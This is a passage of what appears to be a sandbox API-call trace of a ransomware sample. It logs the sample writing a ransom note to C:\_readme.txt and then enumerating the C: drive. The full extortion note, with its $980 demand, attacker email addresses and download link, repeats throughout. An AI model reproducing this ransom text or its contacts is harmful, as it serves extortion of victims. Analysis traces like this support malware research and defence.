folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.419] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466cb0 [0228.419] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0228.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b80570 [0228.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x857) returned 0x3b80e28 [0228.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b80e28, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 1112 [0228.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b81688 [0228.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b80e28 | out: hHeap=0x620000) returned 1 [0228.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b80570 | out: hHeap=0x620000) returned 1 [0228.421] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned 1111 [0228.421] WriteFile (in: hFile=0x640, lpBuffer=0x3b81688*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x39afb64, lpOverlapped=0x0 | out: lpBuffer=0x3b81688*, lpNumberOfBytesWritten=0x39afb64*=0x457, lpOverlapped=0x0) returned 1 [0228.422] CloseHandle (hObject=0x640) returned 1 [0228.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81688 | out: hHeap=0x620000) returned 1 [0228.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78868 | out: hHeap=0x620000) returned 1 [0228.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.424] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x33f03c8 [0228.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0228.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0228.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0228.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0228.424] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0228.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x33f0408 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.425] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0228.425] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0228.425] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x33ecb68 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f0408 | out: hHeap=0x620000) returned 1 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.425] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7b90 [0228.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7b90 | out: hHeap=0x620000) returned 1 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.426] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xcca96960, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0228.426] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x70df58 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.427] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xcce9ae80, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0228.427] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.427] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xac212e70, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xac212e70, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x33b8188 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1958 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x677d88 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0228.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0228.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0228.428] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0228.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0228.428] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.428] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 